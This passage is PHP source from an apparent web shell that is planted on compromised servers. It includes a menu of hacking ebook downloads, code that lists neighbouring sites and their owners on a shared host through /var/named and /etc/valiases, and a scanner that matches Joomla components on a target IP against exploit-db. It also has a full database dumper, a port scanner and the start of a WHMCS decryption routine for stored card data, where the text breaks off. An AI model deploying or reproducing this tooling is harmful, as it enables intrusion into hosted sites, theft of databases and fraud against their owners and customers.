139px"></td>\';\r\necho \'<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">\r\n    </strong>\r\n    </td></tr>\';\r\n}\r\n?></strong></td></tr></table></table></table>\r\n<?\r\n}\r\n///////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'tutor\'))\r\n    {\r\n    ?>\r\n\t<form action="?y=<?php echo $pwd; ?>&x=tutor" method="post">\r\n\t<center><br><br><b>+--=[ Tutorial & Ebook hacking ]=--+</b><br>\r\n\t\t<form method="post" action="">\r\n<table class="tabnet" border="1" >\r\n<tr>\r\n\t\t<td align="center">English</td><td align="center">Indonesian</td>\r\n\t</tr>\r\n\t<tr>\r\n\t\t<td><form method="post" action="">&nbsp;\r\n\tE-book Hacking &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;\r\n\t<select class="inputzbut" name="pilih" id="pilih">\r\n\t<option value=""selected>-----------------[ Select ]-----------------</option>\r\n\t<option value="tutorial24" > Hacking Exposed-5 </option>\r\n\t<option value="tutorial25"> Internet Denial Of Service </option>\r\n\t<option value="tutorial26">Computer Viruses For Dummies</option>\r\n\t<option value="tutorial27">Hack Attacks Testing</option>\r\n\t<option value="tutorial28">Secrets Of A Super Hacker</option>\r\n\t<option value="tutorial29">Stealing The Network</option>\r\n\t<option value="tutorial30">Hacker\'s HandBook</option>\r\n\t</select>\r\n\t<input  type="submit" name="submit" class="inputzbut" value="Download">\r\n\t</td></form>\r\n<td><form method="post" action="">&nbsp;\r\nTutorial by X\'1N73CT &nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;\r\n\t<select class="inputzbut"  name="pilih" id="pilih">\r\n\t<option value=""selected>-----------------[ Select ]-----------------</option>\r\n\t\t<option value="tutorial2">Search Engine Hacking</option>\r\n\t\t<option value="tutorial3">SQL Injection dengan hackbar</option>\r\n\t\t<option value="tutorial1" >Bypass Union</option>\r\n\t</select>\r\n\t<input  type="submit" name="submit" class="inputzbut" value="Download">\r\n</form></td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<form method="post" action="">&nbsp;\r\nE-Book from Syn|gress &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;\r\n\t<select class="inputzbut"  name="pilih" id="pilih">\r\n\t<option value=""selected>-----------------[ Select ]-----------------</option>\r\n\t<option value="cryptography_for_defeloper">Cryptography for Developer</option>\r\n\t<option value="tutorial31">Mobile Malware Attack and Defense</option>\r\n\t<option value="forensic">CD and DVD Forensic</option>\r\n\t<option value="ddd">Open Sourch Security Tools</option>\r\n\t<option value="metasploit">Metaslpoit Toolkit</option>\r\n\t<option value="stealing_network">Stealing the Network</option>\r\n\t<option value="security_polices">Creating Security Polices</option>\r\n\t</select>\r\n\t<input  type="submit" name="submit" class="inputzbut" value="Download">\r\n</form></td>\r\n<td>\r\n<form method="post" action="">&nbsp;\r\nX-CODE MAGAZINE &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;\r\n\t<select class="inputzbut" name="pilih" id="pilih">\r\n\t<option value=""selected>-----------------[ Select ]-----------------</option>\r\n\t<option value="tutorial4">X-CODE MAGAZINE 1</option>\r\n\t<option value="tutorial5">X-CODE MAGAZINE 2</option>\r\n\t<option value="tutorial6">X-CODE MAGAZINE 3</option>\r\n\t<option value="tutorial7">X-CODE MAGAZINE 4</option>\r\n\t<option value="tutorial8">X-CODE MAGAZINE 5</option>\r\n\t<option value="tutorial9">X-CODE MAGAZINE 6</option>\r\n\t<option value="tutorial10">X-CODE MAGAZINE 7</option>\r\n\t<option value="tutorial11">X-CODE MAGAZINE 8</option>\r\n\t<option value="tutorial12">X-CODE MAGAZINE 9</option>\r\n\t<option value="tutorial13">X-CODE MAGAZINE 10</option>\r\n\t<option value="tutorial14">X-CODE MAGAZINE 11</option>\r\n\t<option value="tutorial15">X-CODE MAGAZINE 12</option>\r\n\t<option value="tutorial16">X-CODE MAGAZINE 13</option>\r\n\t<option value="tutorial17">X-CODE MAGAZINE 14</option>\r\n\t<option value="tutorial18">X-CODE MAGAZINE 15</option>\r\n\t<option value="tutorial19">X-CODE MAGAZINE 16</option>\r\n\t<option value="tutorial20">X-CODE MAGAZINE 17</option>\r\n\t<option value="tutorial21">X-CODE MAGAZINE 18</option>\r\n\t<option value="tutorial22">X-CODE MAGAZINE 19</option>\r\n\t<option value="tutorial23">X-CODE MAGAZINE 20</option>\r\n\t<option value="tutorial024">X-CODE MAGAZINE 21</option>\r\n\t</select>\r\n\t<input type="submit" name="submit" class="inputzbut" value="Download" ></a>\r\n</form></td></tr></table><br><br>\r\n<?php\r\n$submit = $_POST [\'submit\'];\r\nif(isset($submit)) {\r\n\t$pilih = $_POST[\'pilih\'];\r\n\t\tif ( $pilih == \'tutorial1\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.pharmconseil-elearning.com/main/upload/by_passing_illegal_mix_of_collations_for_operation__union__by_x_1n73ct.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial2\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.pharmconseil-elearning.com/main/upload/Search_engine_hacking_by_x_1n73ct.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial3\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.pharmconseil-elearning.com/main/upload/Sql_injection_dengan_hackbar.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial4\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_1.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial5\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_2.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial6\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_3.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial7\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_4.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial8\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_5.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial9\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_6.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial10\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_7.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial11\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_8.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial12\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode9.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial13\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode10.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial14\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode11.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial15\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/Xcode12.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial16\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/Xcode13.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial17\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/Xcode14.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial18\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/Xcode15.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial19\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_16.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial20\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_17.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial21\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_18.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial22\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_19.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial23\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_20.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial024\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_21.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\t\r\n\t\telseif ( $pilih == \'tutorial24\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/hacking_exposed_5.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial25\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/internet_denial_of_service.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial26\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/computer_viruses_for_dummies.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial27\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/hack_attacks_testing.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial28\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/secrets_of_super_hacker.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial29\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/stealing_network_how_to_own_shadow.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial30\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/webapp_hackers_handbook.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'ddd\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://199.91.153.95/t8dni7k639hg/3o321lcwwk8u5bh/Open_Source_Security_Tools.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial31\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://205.196.121.149/sg22hm8qjbhg/afsa7ibbk4ny2kd/Mobile_Malware_Attacks_and_Defense.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'cryptography_for_defeloper\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://205.196.121.248/0sod33qw66ug/wypyz555sc9bn7h/Cryptography_for_Developers.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'forensic\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://205.196.120.85/uisebgmioyjg/6l70l00ba9yoksq/CD_and_DVD_Forensics.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'metasploit\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://199.91.153.192/3t115p2f6gvg/zvrrddmq6icqtd2/Metasploit_Toolkit.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}elseif ( $pilih == \'stealing_network\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://205.196.123.138/wbsxltb8rbtg/5vm8a1d23i9zje3/Stealing_the_Network_-_How_to_Own_the_Box.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}elseif ( $pilih == \'security_polices\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://199.91.153.73/6le01f562ehg/6l5ep021dhvlhlq/Creating_Security_Policies_and_Implementing_Identity_Management_with_Active_Directory.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n}\r\n\r\n}\r\n////////////////////////////////////////////////////////////////////\r\n\r\n//////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'cms_detect\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=cms_detect" method="post">\r\n\t<br><br><br><br><center><b><font size=4>+--=[ CMS Detector ]=--+</font></b></center><br><br>\r\n    <?php\r\nif(!file_exists(\'pee.tmp\')){\r\n@fopen(\'pee.tmp\', \'w\');\r\n\r\necho\'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">\';\r\necho\'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table>\';\r\n\r\n$p = 0;\r\n\r\nif(is_readable("/var/named")){\r\n$list = scandir("/var/named");\r\n$current_dir = posix_getcwd();\r\n$dir = explode("/",$current_dir);\r\nforeach($list as $domain){\r\nif(strpos($domain,".db"))\r\n{\r\n\t$domain = str_replace(\'.db\',\'\',$domain);\r\n\t$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));\r\n\t\r\nerror_reporting(0);\r\n\r\n$link = $pageURL.\'pee/\'.$owner[\'name\'];\r\n\r\ncms_add($link,$domain,$owner[\'name\'],"WordPress");\r\ncms_add($link,$domain,$owner[\'name\'],"Joomla");\r\ncms_add($link,$domain,$owner[\'name\'],"vBulletin");\r\ncms_add($link,$domain,$owner[\'name\'],"WHMCS");\r\ncms_add($link,$domain,$owner[\'name\'],"PhpBB");\r\ncms_add($link,$domain,$owner[\'name\'],"MyBB");\r\ncms_add($link,$domain,$owner[\'name\'],"IPB");\r\ncms_add($link,$domain,$owner[\'name\'],"SMF");\r\ncms_add($link,$domain,$owner[\'name\'],"Drupal");\r\ncms_add($link,$domain,$owner[\'name\'],"e107");\r\ncms_add($link,$domain,$owner[\'name\'],"Seditio");\r\ncms_add($link,$domain,$owner[\'name\'],"osCommerce");\r\n\r\n}\r\n}\r\n}\r\n}else{\r\necho\'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">\';\r\necho\'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table><br><br>\';\r\n$content = file_get_contents($pageURL.\'pee.tmp\');\r\necho $content;\r\n}\r\n}\r\n/////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'jss\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=jss" method="post">\r\n    <?php\r\n\techo \'\r\n\r\n<br><br><br><p align="center"><b><font size="3">Enter Targeting IP</font></b></p><br>\r\n<form method="POST">\r\n        <p align="center"><input type="text" class="inputz" name="site" size="65"><input class="inputzbut" type="submit" value="Scan"></p>\r\n</form><center>\r\n\r\n\';\r\n@set_time_limit(0);\r\n@error_reporting(E_ALL | E_NOTICE);\r\n \r\nfunction check_exploit($comxx){\r\n \r\n$link ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$comxx&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";\r\n \r\n$result = @file_get_contents($link);\r\n \r\nif (eregi("No results",$result))  {\r\n \r\necho"<td>Not Found</td><td><a href=\'http://www.google.com/#hl=en&q=download+$comxx+joomla+extension\'>Download</a></td></tr>";\r\n \r\n}else{\r\n \r\necho"<td><a href=\'$link\'>Found</a></td><td><=</td></tr>";\r\n \r\n}\r\n}\r\n \r\nfunction check_com($url){\r\n \r\n$source = @file_get_contents($url);\r\n \r\npreg_match_all(\'{option,(.*?)/}i\',$source,$f);\r\npreg_match_all(\'{option=(.*?)(&amp;|&|")}i\',$source,$f2);\r\npreg_match_all(\'{/components/(.*?)/}i\',$source,$f3);\r\n \r\n$arz=array_merge($f2[1],$f[1],$f3[1]);\r\n \r\n$coms=array();\r\n \r\nforeach(array_unique($arz) as $x){\r\n$coms[]=$x;\r\n}\r\n \r\nforeach($coms as $comm){\r\n \r\necho "<tr><td>$comm</td>";\r\ncheck_exploit($comm);\r\n}\r\n \r\n}\r\n \r\nfunction sec($site){\r\npreg_match_all(\'{http://(.*?)(/index.php)}siU\',$site, $sites);\r\nif(eregi("www",$sites[0][0])){\r\nreturn $site=str_replace("index.php","",$sites[0][0]);\r\n}else{\r\nreturn $site=str_replace("http://","http://www.",str_replace("index.php","",$sites[0][0]));\r\n}}\r\n \r\n$npages = 50000;\r\n \r\nif ($_POST)\r\n{\r\n  $ip = trim(strip_tags($_POST[\'site\']));\r\n  $npage = 1;\r\n  $allLinks = array();\r\n \r\n \r\n   while($npage <= $npages)\r\n  {\r\n \r\n  $x=@file_get_contents(\'http://www.bing.com/search?q=ip%3A\' . $ip . \'+index.php?option=com&first=\' . $npage);\r\n \r\n \r\n        if ($x)\r\n        {\r\n                preg_match_all(\'(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>siU\', $x, $findlink);\r\n              \r\n                foreach ($findlink[1] as $fl)\r\n              \r\n                $allLinks[]=sec($fl);\r\n              \r\n              \r\n                $npage = $npage + 10;\r\n              \r\n                if (preg_match(\'(first=\' . $npage . \'&amp)siU\', $x, $linksuiv) == 0)\r\n                        break;                    \r\n        }\r\n      \r\n    else\r\n                break;\r\n  }\r\n \r\n \r\n$allDmns = array();\r\n \r\nforeach ($allLinks as $kk => $vv){\r\n \r\n$allDmns[] = $vv;\r\n}\r\n                      \r\necho\'<table border="1"  width=\\"80%\\" align=\\"center\\">\r\n<tr><td width=\\"30%\\"><b>Server IP&nbsp;&nbsp;&nbsp;&nbsp; : </b></td><td><b>\'.$ip.\'</b></td></tr>                    \r\n<tr><td width=\\"30%\\"><b>Sites Found&nbsp; : </b></td><td><b>\'.count(array_unique($allDmns)).\'</b></td></tr>\r\n</table>\';\r\necho "<br><br>";\r\n \r\necho\'<table border="1" width="80%" align=\\"center\\">\';\r\n \r\nforeach(array_unique($allDmns) as $h3h3){\r\n \r\necho\'<tr id=new><td><b><a href=\'.$h3h3.\'>\'.$h3h3.\'</a></b></td><td><b>Exploit-db</b></td><td><b>challenge of Exploiting ..!</b></td></tr>\';\r\n \r\ncheck_com($h3h3);\r\n \r\n}\r\n \r\necho"</table>";\r\n \r\n}\r\n}\r\n/////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'dump\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=dump" method="post">\r\n    <?php\r\necho $head.\'<p align="center">\';\r\necho \'\r\n<table width=371 class=tabnet >\r\n<tr><th colspan="2">Database Dump</th></tr>\r\n<tr>\r\n\t<td>Server </td>\r\n\t<td><input class="inputz" type=text name=server size=52></td></tr><tr>\r\n\t<td>Username</td>\r\n\t<td><input class="inputz" type=text name=username size=52></td></tr><tr>\r\n\t<td>Password</td>\r\n\t<td><input class="inputz" type=text name=password size=52></td></tr><tr>\r\n\t<td>DataBase Name</td>\r\n\t<td><input class="inputz" type=text name=dbname size=52></td></tr>\r\n\t<tr>\r\n\t<td>DB Type </td>\r\n\t<td><form method=post action="\'.$me.\'">\r\n\t<select class="inputz" name=method>\r\n\t\t<option  value="gzip">Gzip</option>\r\n\t\t<option value="sql">Sql</option>\r\n\t\t</select>\r\n\t<input class="inputzbut" type=submit value="  Dump!  " ></td></tr>\r\n\t</form></center></table>\';\r\nif ($_POST[\'username\'] && $_POST[\'dbname\'] && $_POST[\'method\']){\r\n$date = date("Y-m-d");\r\n$dbserver = $_POST[\'server\'];\r\n$dbuser = $_POST[\'username\'];\r\n$dbpass = $_POST[\'password\'];\r\n$dbname = $_POST[\'dbname\'];\r\n$file = "Dump-$dbname-$date";\r\n$method = $_POST[\'method\'];\r\nif ($method==\'sql\'){\r\n$file="Dump-$dbname-$date.sql";\r\n$fp=fopen($file,"w");\r\n}else{\r\n$file="Dump-$dbname-$date.sql.gz";\r\n$fp = gzopen($file,"w");\r\n}\r\nfunction write($data) {\r\nglobal $fp;\r\nif ($_POST[\'method\']==\'ssql\'){\r\nfwrite($fp,$data);\r\n}else{\r\ngzwrite($fp, $data);\r\n}}\r\nmysql_connect ($dbserver, $dbuser, $dbpass);\r\nmysql_select_db($dbname);\r\n$tables = mysql_query ("SHOW TABLES");\r\nwhile ($i = mysql_fetch_array($tables)) {\r\n    $i = $i[\'Tables_in_\'.$dbname];\r\n    $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));\r\n    write($create[\'Create Table\'].";\\n\\n");\r\n    $sql = mysql_query ("SELECT * FROM ".$i);\r\n    if (mysql_num_rows($sql)) {\r\n        while ($row = mysql_fetch_row($sql)) {\r\n            foreach ($row as $j => $k) {\r\n                $row[$j] = "\'".mysql_escape_string($k)."\'";\r\n            }\r\n            write("INSERT INTO $i VALUES(".implode(",", $row).");\\n");\r\n        }\r\n    }\r\n}\r\nif ($method==\'ssql\'){\r\nfclose ($fp);\r\n}else{\r\ngzclose($fp);}\r\nheader("Content-Disposition: attachment; filename=" . $file);   \r\nheader("Content-Type: application/download");\r\nheader("Content-Length: " . filesize($file));\r\nflush();\r\n\r\n$fp = fopen($file, "r");\r\nwhile (!feof($fp))\r\n{\r\n    echo fread($fp, 65536);\r\n    flush();\r\n} \r\nfclose($fp); \r\n}\r\n\r\n}\r\n/////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'port-sc\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=port-sc" method="post">\r\n    <?php\r\n    echo \'<br><br><center><br><b>+--=[ Port Scanner ]=--+</b><br>\';\r\n    $start = strip_tags($_POST[\'start\']);\r\n    $end = strip_tags($_POST[\'end\']);\r\n    $host = strip_tags($_POST[\'host\']);\r\n    if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){\r\n    for($i = $start; $i<=$end; $i++){\r\n    $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n    if($fp){\r\n    echo \'Port \'.$i.\' is <font color=green>open</font><br>\';\r\n    }\r\n    flush();\r\n    }\r\n    }else{\r\n    echo \'<table class=tabnet style="width:300px;padding:0 1px;">\r\n   <input type="hidden" name="y" value="phptools">\r\n   <tr><th colspan="5">Port Scanner</th></center></tr>\r\n   <tr>\r\n\t\t<td>Host</td>\r\n\t\t<td><input type="text" class="inputz"  style="width:220px;color:#00ff00;" name="host" value="localhost"/></td>\r\n   </tr>\r\n   <tr>\r\n\t\t<td>Port start</td>\r\n\t\t<td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="start" value="0"/></td>\r\n   </tr>\r\n\t<tr><td>Port end</td>\r\n\t\t<td><input type="text" class="inputz"  style="width:220px;color:#00ff00;" name="end" value="5000"/></td>\r\n   </tr><td><input class="inputzbut" type="submit" style="color:#00ff00" value="Scan Ports" />\r\n   </td></form></center></table>\';\r\n    }\r\n}\r\n/////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'hash\'))\r\n    {\r\n$submit= $_POST[\'enter\'];\r\nif (isset($submit)) {\r\n$pass = $_POST[\'password\']; // password\r\n$salt = \'}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN\'; // random string\r\n$hash = md5($pass); // md5 hash #1\r\n$md4 = hash("md4",$pass);\r\n$hash_md5 = md5($salt.$pass); // md5 hash with salt #2\r\n$hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3\r\n$hash1 = sha1($pass); // sha1 hash #4\r\n$sha256 = hash("sha256",$text);\r\n$hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5\r\n$hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6\r\n}\r\necho \'<form action="" method="post"><b><table class=tabnet>\';\r\necho \'<tr><th colspan="2">Password Hash</th></center></tr>\';\r\necho \'<tr><td><b>masukan kata yang ingin di encrypt:</b></td>\';\r\necho \'<td><input class="inputz" type="text" name="password" size="40" />\';\r\necho \'<input class="inputzbut" type="submit" name="enter" value="hash" />\';\r\necho \'</td></tr><br>\';\r\necho \'<tr><th colspan="2">Hasil Hash</th></center></tr>\';\r\necho \'<tr><td>Original Password</td><td><input class=inputz type=text size=50 value=\'.$pass.\'></td></tr><br><br>\';\r\necho \'<tr><td>MD5</td><td><input class=inputz type=text size=50 value=\'.$hash.\'></td></tr><br><br>\';\r\necho \'<tr><td>MD4</td><td><input class=inputz type=text size=50 value=\'.$md4.\'></td></tr><br><br>\';\r\necho \'<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value=\'.$hash_md5.\'></td></tr><br><br>\';\r\necho \'<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value=\'.$hash_md5_double.\'></td></tr><br><br>\';\r\necho \'<tr><td>Sha1</td><td><input class=inputz type=text size=50 value=\'.$hash1.\'></td></tr><br><br>\';\r\necho \'<tr><td>Sha256</td><td><input class=inputz type=text size=50 value=\'.$sha256.\'></td></tr><br><br>\';\r\necho \'<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value=\'.$hash1_sha1.\'></td></tr><br><br>\';\r\necho \'<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value=\'.$hash1_sha1_double.\'></td></tr><br><br></table>\'; \r\n}\r\n\r\n/////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'whmcs\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=whmcs" method="post">\r\n\r\n<?php\r\n\r\nfunction decrypt ($string,$cc_encryption_hash)\r\n{\r\n    $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);\r\n    $hash_key = _hash ($key);\r\n    $hash_length = strlen ($hash_key);\r\n    $string = base64_decode ($string);\r\n    $tmp_iv = substr ($string, 0, $hash_length);\r\n    $string = substr ($string, $hash_length, strlen ($string) - $hash_length);\r\n    $iv = $out = \'\';\r\n    $c = 